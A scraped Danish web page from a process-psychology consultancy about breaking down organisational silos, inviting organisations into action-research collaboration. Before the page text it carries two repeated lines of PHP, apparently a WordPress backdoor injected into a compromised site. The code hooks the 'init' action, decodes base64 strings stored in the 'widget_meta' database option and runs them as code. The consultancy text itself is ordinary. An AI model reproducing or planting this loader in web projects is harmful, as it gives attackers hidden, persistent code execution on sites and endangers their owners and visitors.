add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); Organisatorisk silodannelse - procespsykologi

Organisatorisk silodannelse

Nedbrydelse af organisatoriske siloer i private og offentlige organisationer
Dobbeltarbejde og manglende koordination mellem organisatoriske enheder er kendetegnende for silo-baserede organisationer, hvor enheder lukker sig organisatoriske omkring egne opgaver. For at facilitere samarbejdet på tværs af sådanne siloer, skal siloer ikke nedbrydes, men derimod gøres transparente, ligesom de kommunikative barrierer imellem dem skal fjernes.

Indenfor organisationsteorien betragtes silodannelse dels som en specialiseringsmulighed, men også som et kommunikations- og udviklingsproblem for organisationen. Ofte ser man de samme undersøgelser, udviklingsprojekter og indsatser finde sted i hver silo, ikke af ond vilje, men udelukkende fordi der mangler blik for hvad der sker i de øvrige dele af organisationen.

Her søger vi organisationer, som oplever at have silo-baserede problemstillinger, og som er interesserede i at etablere et aktionsforskningsbaseret samarbejde om samarbejde på tværs af siloer.